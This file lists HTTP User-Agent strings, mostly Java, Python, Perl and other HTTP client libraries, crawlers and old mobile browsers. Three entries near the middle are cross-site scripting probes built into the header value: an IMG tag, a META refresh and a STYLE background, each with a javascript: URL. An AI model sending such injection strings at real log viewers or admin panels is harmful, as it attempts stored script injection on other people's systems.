libwww-perl/6.04
libwww-perl/6.15
Python-urllib/2.7
okhttp/3.4.1
Python-urllib/2.6
WinHTTP
Jakarta Commons-HttpClient/3.1
Microsoft-CryptoAPI/6.1
Java/1.8.0_66
Apache-HttpClient/4.5.3 (Java/1.8.0_121)
Apache-HttpClient/4.5.2 (Java/1.8.0_60)
Google-HTTP-Java-Client/1.17.0-rc (gzip)
Apache-HttpClient/4.5.2 (Java/1.8.0_151)
Apache-HttpClient/4.2.6 (java 1.5)
Java/1.8.0_121
Apache-HttpClient/4.5.2 (Java/1.8.0_141)
Apache-HttpClient/UNAVAILABLE (java 1.4)
Python-urllib/3.6
Microsoft-CryptoAPI/6.3
Apache-HttpClient/4.3 (java 1.5)
Google-HTTP-Java-Client/1.22.0 (gzip)
Java/1.8.0_181
Apache-HttpClient/4.2.5 (java 1.5)
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_152)
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_111)
Java/1.8.0_181-snc1
Java/1.8.0_51
Java/1.8.0_131
Python-urllib/3.5
Apache-HttpClient/4.5.2 (Java/1.8.0_111)
Mozilla/5.0 (LG-T375 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Apache-HttpClient/4.5.2 (Java/1.8.0_161)
Java/1.7.0_55
Java/1.8.0_60
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_73)
Apache-HttpClient/4.5.2 (Java/1.8.0_181)
Java/1.8.0_151
Jersey/2.25.1 (Apache HttpClient 4.5)
Apache-HttpClient/4.2.1 (java 1.5)
Java/1.7.0_75
Java/1.7.0_80
libwww-perl/6.08
Java/1.8.0_144
Apache-HttpClient/4.5.3 (Java/1.8.0_161)
Java/1.8.0_161
Java/1.8.0_91
Apache-HttpClient/4.3.5 (java 1.5)
Python-urllib/1.17
Apache-HttpClient/4.2.3 (java 1.5)
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_91)
Java/1.7.0_45
Java/1.8.0_111
Python-urllib/3.4
LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/3.1 +http://www.linkedin.com)
Microsoft-CryptoAPI/6.2
Apache-HttpClient/4.3.4 (java 1.5)
EventMachine HttpClient
libwww-perl/6.05
okhttp/2.5.0
Java/1.8.0_171
Java/1.8.0_77
Java/1.8.0_45
Java Browser
Java/1.7.0_151
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_144)
libwww-perl/5.837
Java/1.6.0_26
Apache-HttpClient/4.5.2 (Java/1.8.0_171)
Apache-HttpClient/4.5 (Java/1.8.0_73)
Apache-HttpClient/4.0-alpha4 (java 1.4)
Apache-HttpClient/4.2 (java 1.5)
Java/1.6.0_31
Apache-HttpClient/4.1.1 (java 1.5)
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_111)
spray-can/1.0-M4.2
Java/1.7.0_21
SonyEricssonTM717/R1FC Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.3
Mozilla/5.0 (LG-T385 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Apache-HttpClient/4.5 (Java/1.8.0_91)
Java/1.8.0_31
Java/1.7.0_121
Java/1.8.0_152
Apache-HttpClient/4.5.2 (Java/1.8.0_144)
libwww-perl/5.805
Mozilla/5.0 (LG-T515 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.8.0_101
Apache-HttpClient/4.3.1 (java 1.5)
VB Project
Apache-HttpAsyncClient/4.1.3 (Java/1.8.0_121)
Apache-HttpClient/4.5.2 (Java/1.7.0_79)
Apache-HttpClient/4.3.6 (java 1.5)
Python-urllib/3.7
Java/1.8.0_152-release
LWP::Simple/6.15 libwww-perl/6.15
Mozilla/5.0 (LG-C199 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
yacybot (-global; amd64 Windows 2003 5.2; java 1.8.0_131; Europe/en) http://yacy.net/bot.html
Java/1.8.0_65
SonyEricssonJ10i2/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
ICE Browser/5.05 (Java 1.4.0; Windows 2000 5.0 x86)
Mozilla/5.0 (LG-T585 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.7.0_131
Microsoft-CryptoAPI/10.0
okhttp/2.7.5
Apache-HttpClient/4.5.3 (Java/1.8.0_151)
Java/1.7.0_79
Apache-HttpClient/4.2.2 (java 1.5)
Java/1.8.0_191
Apache-HttpClient/4.5.2 (Java/1.8.0_121)
yacybot (/global; amd64 FreeBSD 10.3-RELEASE; java 1.8.0_77; GMT/en) http://yacy.net/bot.html
Java/1.8.0_05
Apache-HttpClient/4.4.1 (Java/1.7.0_79)
Jakarta Commons-HttpClient/3.0.1
libwww-perl/6.02
Jakarta Commons-HttpClient/2.0final
libwww-perl/6.13
muCommander v0.8.3 (Java 1.4.2_03-b02; Windows XP 5.1 x86)
Mozilla/5.0 (LG-T395 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.8.0_03-Ubuntu
Apache-HttpClient/4.5.2 (Java/1.7.0_55)
Apache-HttpClient/4.5.3 (Java/1.8.0_111)
Apache-HttpClient/4.5 (Java/1.8.0_05)
SonyEricssonW995/R1HA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.5
Java/1.7.0_111
Java/1.8.0_74
Java1.6.0_35
Java/1.6.0_04
Apache-HttpClient/4.5.2 (Java/1.8.0_65)
SonyEricssonJ20i/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
libwww-perl/6.31
Apache-HttpClient/4.5.2 (Java/1.8.0_191)
SonyEricssonJ108i/R7DA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Java/1.7.0_99
Apache-HttpClient/4.4.1 (Java/1.8.0_65)
okhttp/3.5.0
Java/1.8.0_162
Java/1.8.0_25
Apache-HttpClient/4.3.2 (java 1.5)
Apache-HttpClient/4.3.3 (java 1.5)
Java/1.8.0_40
Apache-HttpClient/4.1 (java 1.5)
Java/1.7.0_09
Apache-HttpClient/4.5.3 (Java/1.8.0_131)
Java/1.8.0_102
okhttp/3.9.1
Apache-HttpClient/4.5.3 (Java/1.8.0_171)
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_111; Europe/en) http://yacy.net/bot.html
libwww-perl/6.35
libwww-perl/6.33
Java/1.8.0_72
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_121)
Mozilla/4.5 RPT-HTTPClient/0.3-2
Java/1.7.0_101
Microsoft-CryptoAPI/6.0
Java/1.7.0_95
Awesomium - PureBasic
Mozilla/5.0 (X11; compatible; semantic-visions.com crawler; HTTPClient 3.1)
Mozilla/5.0 (compatible; Funnelback) RPT-HTTPClient/0.3-3E
libwww-perl/6.26
Java/1.7.0_65
Java/1.8.0_73
Python-urllib/2.5
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_151)
Java/1.7.0_71
Mozilla/5.0 (LG-C333 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_101)
SonyEricssonJ108a/R7DA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Apache-HttpClient/4.1.3 (java 1.5)
Java/1.8.0_66-internal
Apache-HttpClient/4.5.5 (Java/1.8.0_161)
Java/1.6.0_15
AsyncHttpClient 1.0
libwww-perl/5.820
LWP::Simple/6.13 libwww-perl/6.13
Java/1.4.1_01
Apache-HttpClient/4.5 (Java/1.8.0_60)
Apache-HttpAsyncClient/4.1.1 (Java/1.8.0_151)
spray-can/1.3.3
Mozilla/5.0 (LG-C195 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
libwww-perl/6.29
lwp-request/5.834 libwww-perl/5.834
Mozilla/5.0 (LG/GD880 Browser/AppleWebKit/531 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.7.0_07
Apache-HttpClient/4.5.1 (Java/1.7.0_10)
Java/1.6.0_32
HotJava/1.1.2 FCS
yacybot (/global; amd64 Linux 4.4.74-minimal; java 1.8.0; Europe/en) http://yacy.net/bot.html
Apache-HttpClient/4.5 (Java/1.8.0_101)
Apache-HttpClient/4.5 (Java/1.8.0_77)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; GWX:MANAGED; Java/1.8.0_73)
SonyEricssonC510/R1HA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.5
HotJava/1.0.1/JRE1.1.x
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_181)
Java1.0.21.0
Mozilla/5.0 (Java; U; en-in; nokia300)
Java/1.6.0_24
Jakarta Commons-HttpClient/2.0xxx
yacybot (/global; amd64 Linux 3.16.0-6-amd64; java 1.8.0_111; Europe/en) http://yacy.net/bot.html
Java/1.7.0_03
Mozilla<IMG SRC=javascript:qss=7>
Mozilla<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
Mozilla<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
Java/1.7.0_67
Java/1.7.0_76
SonyEricssonJ105i/R1HA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.5
Apache-HttpClient/4.5.1 (Java/1.8.0_51)
Apache-HttpClient/4.5.5 (Java/1.8.0_144)
Java0
libwww-perl/6.34
libwww-perl/5.821
okhttp/3.2.0
SonyEricssonU10i/R7AA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.1
Mozilla/5.0 (LG-C205 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
SonyEricssonT700/R3EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
Mozilla/5.0 (LG-C375 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
LWP::Simple/6.00 libwww-perl/6.05
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_171)
Mozilla/5.0 (LG-T580 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Java/1.6.0_13
Python-urllib/3.2
yacybot (/global; amd64 Linux 4.4.0-21-generic; java 1.8.0_111; Europe/pl) http://yacy.net/bot.html
Java1.4.0
Java/1.8.0_161-snc1
okhttp/3.8.1
Java/1.7.0_09-icedtea
Python-urllib/2.5 AppEngine-Google; (+http://code.google.com/appengine; appid: s~html2canvas)
SonyEricssonW995/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.2
libwww-perl
Java/1.7.0_15
Python-urllib/2.4
Java/1.6.0_20
yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_112; Europe/de) http://yacy.net/bot.html
Java/1.8.0_71
Java/1.8.0_92
Jakarta Commons-HttpClient/3.0
Mozilla/5.0 (LG-C370 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Apache-HttpClient/4.4.1 (Java/1.8.0_45)
Java/1.8.0_112
libwww-perl/6.27
yacybot (/global; x86_64 Mac OS X 10.11.5; java 1.8.0_91; America/en) http://yacy.net/bot.html
libwww-perl/6.36
TulipChain/5.x (http://ostermiller.org/tulipchain/) Java/1.x.1_0x (http://java.sun.com/) Linux/2.4.17
SonyEricssonU10i/R7BA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Apache-HttpClient/4.5.3 (Java/1.8.0_71)
Java/1.7.0_171
Jakarta Commons-HttpClient/3.0-rcx
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_131)
Apache-HttpClient/4.5.4 (Java/1.8.0_141)
Mozilla/3.0 (compatible; TALWinInetHTTPClient)
Vodafone/1.0/V702NK/NKJ001/SN354350000611211 Java/VF-Java/1.0 Series60/2.6 Nokia6630/2.39.148 Profile/MIDP-2.0 Configuration/CLDC-1.1 UNTRUSTED/1.0
yacybot (/global; amd64 Linux 3.13.0-86-generic; java 1.7.0_101; Europe/en) http://yacy.net/bot.html
lwp-request/6.03 libwww-perl/6.04
SynHttpClient-Built/5780
yacybot (-global; amd64 Linux 4.8.0-51-generic; java 1.8.0_131; Europe/en) http://yacy.net/bot.html
Java/9-ea
Java/1.7.0_25
Java/1.7.0_11
Java/1.6.0_01
Java/10.0.1
Mozilla/5.0 (Vodafone/1.0/LG-T385b/V10h AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Python-urllib/3.1
yacybot (/global; arm Linux 3.8.13.30; java 1.8.0_91; Europe/de) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 3.10.0-693.5.2.el7.x86_64; java 1.8.0_151; Europe/en) http://yacy.net/bot.html
Mozilla/5.0 (LG-T510 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Mozilla/5.0 (compatible; X-CAD-SE/1.75; +http://info.cadse.easterngraphics.com/wa_contact/) Java/1.8.0_60
PECL::HTTP/1.4.0 (PHP/5.1.6)
TulipChain/5.xx (http://ostermiller.org/tulipchain/) Java/1.x.1_0x (http://apple.com/) Mac_OS_X/10.2.8
Apache-HttpClient/4.5.1 (Java/1.8.0_131)
Java/1.7.0_60-ea
yacybot (freeworld/global; amd64 Windows 10 10.0; java 1.8.0_60; Europe/de) http://yacy.net/bot.html
lwp-request/6.03 libwww-perl/6.05
yacybot (/global; amd64 Linux 3.16.0-38-generic; java 1.7.0_79; Europe/de) http://yacy.net/bot.html
Mozilla/5.0 (LG-C360 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Apache-HttpClient/4.5.5 (Java/1.7.0_151)
yacybot (-global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_121; Europe/de) http://yacy.net/bot.html
Java/1.6.0_35
Apache-HttpClient/4.5.3 (Java/1.8.0_144)
Java/1.8.0_112-release
Java/1.8.0
yacybot (/global; amd64 FreeBSD 11.1-RELEASE-p4; java 1.8.0_144; Europe/en) http://yacy.net/bot.html
SonyEricssonW902/R3EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
Apache-HttpClient/4.5.6 (Java/1.8.0_191)
Java/1.8.0_141
Apache-HttpClient/4.5 (Java/1.8.0_25)
yacybot (/global; amd64 Linux 4.10.0-38-generic; java 1.8.0_141; Europe/pl) http://yacy.net/bot.html
SonyEricssonJ108i/R7EA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Java/1.6.0_07
Apache-HttpClient/4.0-beta2 (java 1.5)
okhttp/3.8.0
Apache-HttpClient/4.5.3 (Java/9.0.4)
lwp-request/6.03 libwww-perl/6.03
Python-urllib/3.3
LWP::Simple/5.827 libwww-perl/5.833
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; GWX:MANAGED; Java/1.8.0_73)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; GWX:MANAGED) Java/1.8.0_73
SonyEricssonW595/R3DA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.2
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; GWX:MANAGED) Awesomium/1.7.4.2
Apache-HttpClient/4.5.2 (Java/1.8.0_131)
Mozilla/5.0 (LG-C398 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64) Awesomium/1.7.4.2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64) Awesomium/1.7.4.2
yacybot (-global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_101; Europe/en) http://yacy.net/bot.html
Apache-HttpAsyncClient/4.1.2 (Java/1.8.0_181)
Mozilla/5.0 (Java 1.7.0_11; Linux 3.17.3-1-ARCH amd64; en_US) ICEbrowser/v6_0_2
yacybot (/global; amd64 Linux 4.4.0-77-generic; java 1.8.0_121; Europe/de) http://yacy.net/bot.html
SonyEricssonT700/R3EG Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
Java/1.4.2_03
yacybot (/global; amd64 Linux 3.12.43-52.6-default; java 1.8.0_40; Europe/en) http://yacy.net/bot.html
Mozilla/5.0 (Java 1.6.0_17; Windows 7 6.1 amd64; en_AU) ICEbrowser/v6_0_2
Java/1.7.0_19
Java/1.6.0_22
Apache-HttpClient/4.4.1 (Java/1.8.0_91)
Python-urllib/2.6 (http://juls.savba.sk)
yacybot (/global; amd64 Linux 4.10.0-38-generic; java 9-internal; Europe/pl) http://yacy.net/bot.html
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_20)
Apache-HttpClient/4.5.1 (Java/1.7.0_79)
Java/1.8.0_112-google-v7
libwww-perl/5.833
SonyEricssonW595/R3EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.7.0_101; Europe/en) http://yacy.net/bot.html
okhttp/3.6.0
SonyEricssonC702/R3EK Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
SonyEricssonW20i/R7DA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Java/1.7.0_17
Mozilla/5.0 (LG-T565 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
Mozilla/5.0 (LG-C199 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1),gzip(gfe)
Mozilla/5.0 (Java 1.6.0_17; Windows 7 6.1 amd64; en_US) ICEbrowser/v6_0_2
libwww-perl/6.24
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_91)
Mozilla/5.0 (Java 1.6.0_17; Windows 7 6.1 amd64; ar_IQ) ICEbrowser/v6_0_2
Apache-HttpClient/4.4.1 (Java/1.8.0_77)
SonyEricsson J20i_SonyEricssonJ20i/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Java/1.7.0_02
AMOS Java/1.8.0_144
Java/1.6.0_33
Apache-HttpClient/4.5.6 (Java/1.8.0_161)
libwww-perl/5.48
Java/1.6.0_17
Mozilla/5.0 (Vodafone/1.0/LG-T385b/V10e AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
libwww-perl/6.06
Jakarta Commons-HttpClient/2.0rc1
spray-can/1.2.1
libwww-perl/5.831
Apache-HttpClient/4.5 (Java/1.7.0_80)
SonyEricssonT715a/R1GA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
libwww-perl/5.834
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_91; Europe/en) http://yacy.net/bot.html
Mozilla/5.0 (LG/GD880 Browser/AppleWebKit/531 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
yacybot (/global; amd64 Linux 3.13.0-91-generic; java 1.7.0_101; Europe/en) http://yacy.net/bot.html
SonyEricssonW20i/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Java/1.6.0_27
Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_162
HotJava
Python-urllib/3.0
libwww-perl/#.###
SynHttpClient-Built/5825
libwww-perl/5.014
LG/GT505/v10a Browser/Teleca-Q7.1 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1
SonyEricssonC902/R3EG Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 model-orange JavaPlatform/JP-8.3.3
Java/1.6.0
Apache-HttpClient/4.5.3 (Java/1.8.0_141)
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.8.0_141)
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) RPT-HTTPClient/0.3-3E
SonyEricssonW20/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Apache-HttpClient/4.5.2 (Java/1.7.0_111)
Apache-HttpClient/4.5 (Java/1.8.0_45)
Java 1.7 Apache HttpClient (Linux x86_64) / GnowitNewsbot / Contact information at http://www.gnowit.com
Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_40)
Java/1.6.0_21
Apache-HttpClient/4.5.2 (Java/1.8.0_92)
Python-urllib/1.17 AppEngine-Google; (+http://code.google.com/appengine)
yacybot (/global; amd64 Linux 3.13.0-88-generic; java 1.7.0_101; Europe/en) http://yacy.net/bot.html
SonyEricssonC510a/R1FA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.3
lwp-request/5.834 libwww-perl/6.05
yacybot (/global; x86_64 Mac OS X 10.12.3; java 1.8.0_121; America/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-71-generic; java 1.8.0_121; Europe/en) http://yacy.net/bot.html
Mozilla/5.0 (Java 1.6.0_12; Windows Vista 6.1 amd64; it_IT) ICEbrowser/v6_0_2
Python-urllib/1.16
LG-GT505/v10a Browser/Teleca-Q7.1 MMS/LG-MMS-V1.0/1.2 MediaPlayer/LGPlayer/1.0 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1
LWP::Simple/5.835 libwww-perl/5.837
Java/1.8.0_144-snc1
Java/1.6.0_37
Mozilla/5.0 (Java 1.7.0_45; Mac OS X 10.12.5 x86_64; en_US) ICEbrowser/v6_1_4
Jakarta Commons-HttpClient/3.0-rc4
Apache-HttpClient/4.5.2 (Java/1.7.0_151)
yacybot (/global; amd64 Windows 8 6.2; java 1.7.0_55; Europe/en) http://yacy.net/bot.html
Jakarta Commons-HttpClient/3.1 Java/1.6.0_26
yacybot (/global; amd64 Linux 4.13.0-16-generic; java 1.8.0_151; Europe/en) http://yacy.net/bot.html
Paksi Browser JAVA
Apache-HttpClient/4.5.3-SNAPSHOT (Java/1.7.0_80)
SonyEricssonJ108a/R7EA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Mozilla/5.0 (Java 1.6.0_17; Windows 7 6.1 amd64; sk_SK) ICEbrowser/v6_0_2
me Java/1.7.0_25
me Java/
yacybot (/global; amd64 Linux 4.4.0-77-generic; java 1.8.0_131; Europe/de) http://yacy.net/bot.html
Java/
Paxi Java
Apache-HttpClient/4.4.1 (Java/1.7.0_72)
Java/1.7.0_01
Java1.7.0_51
SonyEricssonW995a/R1GB Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.4
Java/1.6.0_28
SonyEricssonW705/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.2
yacybot (webportal-global; amd64 Linux 2.6.32-5-amd64; java 1.6.0_18; Canada/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.15.1-2-ARCH; java 9.0.4; Europe/de) http://yacy.net/bot.html
yacybot (-global; amd64 FreeBSD 9.2-RELEASE-p15; java 1.7.0_76; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_111; Europe/de) http://yacy.net/bot.html
yacybot (/global; ppc64 OS/400 V7R1M0; java 1.8.0; UTC/en) http://yacy.net/bot.html
SonyEricssonW595/R3EG Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
irssi/0.5 libwww-perl/5.834
yacybot (/global; amd64 Windows 8 6.2; java 1.7.0_55; America/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.4.0-31-generic; java 1.8.0_91; Europe/en) http://yacy.net/bot.html
yacybot (/global; ppc64 OS/400 V7R3M0; java 1.8.0; Europe/de) http://yacy.net/bot.html
Java/1.6.0_29
Mozilla/5.0 (LG-T500 AppleWebkit/531 Browser/Phantom/V2.0 Widget/LGMW/3.0 MMS/LG-MMS-V1.0/1.2 Java/ASVM/1.1 Profile/MIDP-2.1 Configuration/CLDC-1.1)
yacybot (/global; amd64 Linux 3.16.0-0.bpo.4-amd64; java 1.8.0_66; Europe/en) http://yacy.net/bot.html
yacybot (/global; amd64 Linux 4.14.7-1-ARCH; java 1.8.0_144; America/en) http://yacy.net/bot.html
Java/1.8.0_172
SonyEricssonJ10i/R7CA Browser/NetFront/3.5 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.5.2
Mozilla/5.0 (Java 1.7.0_11; Linux 2.6.32-5-amd64 amd64; en_US) ICEbrowser/v6_0_2
yacybot (/global; amd64 Linux 4.9.0-4-amd64; java 1.8.0_151; Europe/en) http://yacy.net/bot.html
Funnelback RPT-HTTPClient/0.3-3E
yacybot (/global; amd64 Linux 3.16.0-4-amd64; java 1.8.0_121; Etc/en) http://yacy.net/bot.html
SonyEricssonC902/R3CA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.1
Apache-HttpClient/ Zoodfood (java 1.5)
SonyEricssonC902/R3EG Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.3.3
Apache-HttpClient/UNAVAILABLE (java 1.5)
SonyEricssonW995/R1FA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1 JavaPlatform/JP-8.4.3
yacybot (/global; amd64 Linux 4.4.0-21-generic; java 1.8.0_121; Europe/pl) http://yacy.net/bot.html
Apache-HttpClient/4.5.2 (Java/1.7.0_51)
